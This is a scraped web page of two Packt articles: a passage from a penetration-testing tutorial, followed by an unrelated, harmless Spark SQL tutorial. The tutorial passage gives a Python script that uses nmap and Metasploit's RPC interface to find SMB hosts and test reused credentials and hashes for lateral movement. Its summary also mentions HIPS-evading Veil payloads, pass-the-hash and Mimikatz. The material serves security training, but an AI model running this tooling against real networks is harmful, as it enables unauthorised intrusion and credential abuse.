is relatively simple, but we can automate a portion of this with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for active ports of 445, then generate a list of targets to test using a username and password passed via argument to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install SpiderLabs msfrpc library for Python. This library can be found here at https://github.com/SpiderLabs/msfrpc.git. The script we are creating uses the netifaces library to identify what interface IP addresses belong to your host. It then scans for port 445 the SMB port on the IP address, range, or the Classes Inter Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interface and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies what users are logged onto the system. The outputs of this script in addition to real time response are two files, a log file that contains all the responses, and a file that holds the IP addresses for all the hosts that have SMB services. This Metasploit module takes advantage of RPCDCE, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation. This file could then be fed back into the script, if you as an attacker find other credential sets to test as shown following: Lastly, the script can be passed hashes directly just like the Metasploit module as shown following: The output will be slightly different for each running of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical with a Metasploit console initiation. Now there are a couple things that have to be stated, yes you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. Also the MSFRPC can have resource files fed directly into it as well, but it can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration. Like all scripts libraries are needed to be established, most of these you are already familiar with, the newest one relates to the MSFRPC by SpiderLabs. The required libraries for this script can be seen as follows: import os, argparse, sys, time try: import msfrpc except: sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git") try: import nmap except: sys.exit("[!] Install the nmap library: pip install python- nmap") try: import netifaces except: sys.exit("[!] Install the netifaces library: pip install netifaces") We then build a module, to identify relevant targets that are going to have the auxiliary module run against it. First, we setup the constructors and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results. def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile): hostlist = [] pre_pend = "smb" service_name = "microsoft-ds" service_name2 = "netbios-ssn" protocol = "tcp" port_state = "open" bufsize = 0 hosts_output = "%s/%s_hosts" % (dir, pre_pend) After which, we configure the nmap scanner to scan for details either by file or by command line. Notice that the hostlist is a string of all the addresses loaded by the file, and they are separated by spaces. The ipfile is opened and read and then all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the specific hosts argument of the nmap library. if ipfile != None: if verbose > 0: print("[*] Scanning for hosts from file %s") % (ipfile) with open(ipfile) as f: hostlist = f.read().replace('n',' ') scanner.scan(hosts=hostlist, ports=port_num) else: if verbose > 0: print("[*] Scanning for host(s) %s") % (ips) scanner.scan(ips, port_num) open(hosts_output, 'w').close() hostlist=[] if scanner.all_hosts(): e = open(hosts_output, 'a', bufsize) else: sys.exit("[!] No viable targets were found!") The IP addresses for all of the interfaces on the attack system are removed from the test pool. for host in scanner.all_hosts(): for k,v in ifaces.iteritems(): if v['addr'] == host: print("[-] Removing %s from target list since it belongs to your interface!") % (host) host = None Finally, the details are then written to the relevant output file and python lists, and then returned to the original call origin. if host != None: e = open(hosts_output, 'a', bufsize) if service_name or service_name2 in scanner[host][protocol][int(port_num)]['name']: if port_state in scanner[host][protocol][int(port_num)]['state']: if verbose > 0: print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num) hostdata=host + "n" e.write(hostdata) hostlist.append(host) else: if verbose > 0: print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num) if not scanner.all_hosts(): e.closed if hosts_output: return hosts_output, hostlist The next function creates the actual command that will be executed; this function will be called for each host the scan returned back as a potential target. def build_command(verbose, user, passwd, dom, port, ip): module = "auxiliary/scanner/smb/smb_enumusers_domain" command = '''use ''' + module + ''' set RHOSTS ''' + ip + ''' set SMBUser ''' + user + ''' set SMBPass ''' + passwd + ''' set SMBDomain ''' + dom +''' run ''' return command, module The last function actually initiates the connection with the MSFRPC and executes the relevant command per specific host. def run_commands(verbose, iplist, user, passwd, dom, port, file): bufsize = 0 e = open(file, 'a', bufsize) done = False The script creates a connection with the MSFRPC and creates console then tracks it by a specific console_id. Do not forget, the msfconsole can have multiple sessions, and as such we have to track our session to a console_id. client = msfrpc.Msfrpc({}) client.login('msf','msfrpcpassword') try: result = client.call('console.create') except: sys.exit("[!] Creation of console failed!") console_id = result['id'] console_id_int = int(console_id) The script then iterates over the list of IP addresses that were confirmed to have an active SMB service. The script then creates the necessary commands for each of those IP addresses. for ip in iplist: if verbose > 0: print("[*] Building custom command for: %s") % (str(ip)) command, module = build_command(verbose, user, passwd, dom, port, ip) if verbose > 0: print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip)) The command is then written to the console and we wait for the results. client.call('console.write',[console_id, command]) time.sleep(1) while done != True: We await the results for each command execution and verify the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has completed, the results are written in the specified output file. result = client.call('console.read',[console_id_int]) if len(result['data']) > 1: if result['busy'] == True: time.sleep(1) continue else: console_output = result['data'] e.write(console_output) if verbose > 0: print(console_output) done = True We close the file and destroy the console to clean up the work we had done. e.closed client.call('console.destroy',[console_id]) The final pieces of the script are related to setting up the arguments, setting up the constructors and calling the modules. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading of the msgrpc at the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it. load msgrpc Pass=msfrpcpassword The command was not mistyped, Metasploit has moved to msgrpc verses msfrpc, but everyone still refers to it as msfrpc. The big difference is the msgrpc library uses POST requests to send data while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service. Summary In this article, we highlighted a manner in which you can move through a sample environment. Specifically, how to exploit a relative box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC. Resources for Article: Further resources on this subject: Basics of Jupyter Notebook and Python[article] Scraping the Data[article] Modeling complex functions with artificial neural networks [article]
Read more
  • 0
  • 0
  • 16067

article-image-integration-spark-sql
Packt
24 Sep 2015
11 min read
Save for later

Integration with Spark SQL

Packt
24 Sep 2015
11 min read
 In this article by Sumit Gupta, the author of the book Learning Real-time Processing with Spark Streaming, we will discuss the integration of Spark Streaming with various other advance Spark libraries such as Spark SQL. (For more resources related to this topic, see here.) No single software in today's world can fulfill the varied, versatile, and complex demands/needs of the enterprises, and to be honest, neither should it! Software are made to fulfill specific needs arising out of the enterprises at a particular point in time, which may change in future due to many other factors. These factors may or may not be controlled like government policies, business/market dynamics, and many more. Considering all these factors integration and interoperability of any software system with internal/external systems/software's is pivotal in fulfilling the enterprise needs. Integration and interoperability are categorized as nonfunctional requirements, which are always implicit and may or may not be explicitly stated by the end users. Over the period of time, architects have realized the importance of these implicit requirements in modern enterprises, and now, all enterprise architectures provide support due diligence and provisions in fulfillment of these requirements. Even the enterprise architecture frameworks such as The Open Group Architecture Framework (TOGAF) defines the specific set of procedures and guidelines for defining and establishing interoperability and integration requirements of modern enterprises. Spark community realized the importance of both these factors and provided a versatile and scalable framework with certain hooks for integration and interoperability with the different systems/libraries; for example; data consumed and processed via Spark streams can also be loaded into the structured (table: rows/columns) format and can be further queried using SQL. Even the data can be stored in the form of Hive tables in HDFS as persistent tables, which will exist even after our Spark program has restarted. In this article, we will discuss querying streaming data in real time using Spark SQL. Querying streaming data in real time Spark Streaming is developed on the principle of integration and interoperability where it not only provides a framework for consuming data in near real time from varied data sources, but at the same time, it also provides the integration with Spark SQL where existing DStreams can be converted into structured data format for querying using standard SQL constructs. There are many such use cases where SQL on streaming data is a much needed feature; for example, in our distributed log analysis use case, we may need to combine the precomputed datasets with the streaming data for performing exploratory analysis using interactive SQL queries, which is difficult to implement only with streaming operators as they are not designed for introducing new datasets and perform ad hoc queries. Moreover SQL's success at expressing complex data transformations derives from the fact that it is based on a set of very powerful data processing primitives that do filtering, merging, correlation, and aggregation, which is not available in the low-level programming languages such as Java/ C++ and may result in long development cycles and high maintenance costs. Let's move forward and first understand few things about Spark SQL, and then, we will also see the process of converting existing DStreams into the Structured formats. Understanding Spark SQL Spark SQL is one of the modules developed over the Spark framework for processing structured data, which is stored in the form of rows and columns. At a very high level, it is similar to the data residing in RDBMS in the form rows and columns, and then SQL queries are executed for performing analysis, but Spark SQL is much more versatile and flexible as compared to RDBMS. Spark SQL provides distributed processing of SQL queries and can be compared to frameworks Hive/Impala or Drill. Here are the few notable features of Spark SQL: Spark SQL is capable of loading data from variety of data sources such as text files, JSON, Hive, HDFS, Parquet format, and of course RDBMS too so that we can consume/join and process datasets from different and varied data sources. It supports static and dynamic schema definition for the data loaded from various sources, which helps in defining schema for known data structures/types, and also for those datasets where the columns and their types are not known until runtime. It can work as a distributed query engine using the thrift JDBC/ODBC server or command-line interface where end users or applications can interact with Spark SQL directly to run SQL queries. Spark SQL provides integration with Spark Streaming where DStreams can be transformed into the structured format and further SQL Queries can be executed. It is capable of caching tables using an in-memory columnar format for faster reads and in-memory data processing. It supports Schema evolution so that new columns can be added/deleted to the existing schema, and Spark SQL still maintains the compatibility between all versions of the schema. Spark SQL defines the higher level of programming abstraction called DataFrames, which is also an extension to the existing RDD API. Data frames are the distributed collection of the objects in the form of rows and named columns, which is similar to tables in the RDBMS, but with much richer functionality containing all the previously defined features. The DataFrame API is inspired by the concepts of data frames in R (http://www.r-tutor.com/r-introduction/data-frame) and Python (http://pandas.pydata.org/pandas-docs/stable/dsintro.html#dataframe). Let's move ahead and understand how Spark SQL works with the help of an example: As a first step, let's create sample JSON data about the basic information about the company's departments such as Name, Employees, and so on, and save this data into the file company.json. The JSON file would look like this: [ { "Name":"DEPT_A", "No_Of_Emp":10, "No_Of_Supervisors":2 }, { "Name":"DEPT_B", "No_Of_Emp":12, "No_Of_Supervisors":2 }, { "Name":"DEPT_C", "No_Of_Emp":14, "No_Of_Supervisors":3 }, { "Name":"DEPT_D", "No_Of_Emp":10, "No_Of_Supervisors":1 }, { "Name":"DEPT_E", "No_Of_Emp":20, "No_Of_Supervisors":5 } ] You can use any online JSON editor such as http://codebeautify.org/online-json-editor to see and edit data defined in the preceding JSON code. Next, let's extend our Spark-Examples project and create a new package by the name chapter.six, and within this new package, create a new Scala object and name it as ScalaFirstSparkSQL.scala. Next, add the following import statements just below the package declaration: import org.apache.spark.SparkConf import org.apache.spark.SparkContext import org.apache.spark.sql._ import org.apache.spark.sql.functions._ Further, in your main method, add following set of statements to create SQLContext from SparkContext: //Creating Spark Configuration val conf = new SparkConf() //Setting Application/ Job Name conf.setAppName("My First Spark SQL") // Define Spark Context which we will use to initialize our SQL Context val sparkCtx = new SparkContext(conf) //Creating SQL Context val sqlCtx = new SQLContext(sparkCtx) SQLContext or any of its descendants such as HiveContext—for working with Hive tables or CassandraSQLContext—for working with Cassandra tables is the main entry point for accessing all functionalities of Spark SQL. It allows the creation of data frames, and also provides functionality to fire SQL queries over data frames. Next, we will define the following code to load the JSON file (company.json) using the SQLContext, and further, we will also create a data frame: //Define path of your JSON File (company.json) which needs to be processed val path = "/home/softwares/spark/data/company.json"; //Use SQLCOntext and Load the JSON file. //This will return the DataFrame which can be further Queried using SQL queries. val dataFrame = sqlCtx.jsonFile(path) In the preceding piece of code, we used the jsonFile(…) method for loading the JSON data. There are other utility method defined by SQLContext for reading raw data from filesystem or creating data frames from the existing RDD and many more. Spark SQL supports two different methods for converting the existing RDDs into data frames. The first method uses reflection to infer the schema of an RDD from the given data. This approach leads to more concise code and helps in instances where we already know the schema while writing Spark application. We have used the same approach in our example. The second method is through a programmatic interface that allows to construct a schema. Then, apply it to an existing RDD and finally generate a data frame. This method is more verbose, but provides flexibility and helps in those instances where columns and data types are not known until the data is received at runtime. Refer to https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.SQLContext for a complete list of methods exposed by SQLContext. Once the DataFrame is created, we need to register DataFrame as a temporary table within the SQL context so that we can execute SQL queries over the registered table. Let's add the following piece of code for registering our DataFrame with our SQL context and name it company: //Register the data as a temporary table within SQL Context //Temporary table is destroyed as soon as SQL Context is destroyed. dataFrame.registerTempTable("company"); And we are done… Our JSON data is automatically organized into the table (rows/column) and is ready to accept the SQL queries. Even the data types is inferred from the type of data entered within the JSON file itself. Now, we will start executing the SQL queries on our table, but before that let's see the schema being created/defined by SQLContext: //Printing the Schema of the Data loaded in the Data Frame dataFrame.printSchema(); The execution of the preceding statement will provide results similar to mentioned illustration: The preceding illustration shows the schema of the JSON data loaded by Spark SQL. Pretty simple and straight, isn't it? Spark SQL has automatically created our schema based on the data defined in our company.json file. It has also defined the data type of each of the columns. We can also define the schema using reflection (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#inferring-the-schema-using-reflection) or can also programmatically define the schema (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#inferring-the-schema-using-reflection). Next, let's execute some SQL queries to see the data stored in DataFrame, so the first SQL would be to print all records: //Executing SQL Queries to Print all records in the DataFrame println("Printing All records") sqlCtx.sql("Select * from company").collect().foreach(print) The execution of the preceding statement will produce the following results on the console where the driver is executed: Next, let's also select only few columns instead of all records and print the same on console: //Executing SQL Queries to Print Name and Employees //in each Department println("n Printing Number of Employees in All Departments") sqlCtx.sql("Select Name, No_Of_Emp from company").collect().foreach(println) The execution of the preceding statement will produce the following results on the Console where the driver is executed: Now, finally let's do some aggregation and count the total number of all employees across the departments: //Using the aggregate function (agg) to print the //total number of employees in the Company println("n Printing Total Number of Employees in Company_X") val allRec = sqlCtx.sql("Select * from company").agg(Map("No_Of_Emp"->"sum")) allRec.collect.foreach ( println ) In the preceding piece of code, we used the agg(…) function and performed the sum of all employees across the departments, where sum can be replaced by avg, max, min, or count. The execution of the preceding statement will produce the following results on the console where the driver is executed: The preceding images shows the results of executing the aggregation on our company.json data. Refer to the Data Frame API at https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.DataFrame for further information on the available functions for performing aggregation. As a last step, we will stop our Spark SQL context by invoking the stop() function on SparkContext—sparkCtx.stop(). This is required so that your application can notify master or resource manager to release all resources allocated to the Spark job. It also ensures the graceful shutdown of the job and avoids any resource leakage, which may happen otherwise. Also, as of now, there can be only one Spark context active per JVM, and we need to stop() the active SparkContext class before creating a new one. Summary In this article, we have seen the step-by-step process of using Spark SQL as a standalone program. Though we have considered JSON files as an example, but we can also leverage Spark SQL with Cassandra (https://github.com/datastax/spark-cassandra-connector/blob/master/doc/2_loading.md) or MongoDB (https://github.com/Stratio/spark-mongodb) or Elasticsearch (http://chapeau.freevariable.com/2015/04/elasticsearch-and-spark-1-dot-3.html). Resources for Article: Further resources on this subject: Getting Started with Apache Spark DataFrames[article] Sabermetrics with Apache Spark[article] Getting Started with Apache Spark [article]
Read more
  • 0
  • 0
  • 4455
Modal Close icon
Modal Close icon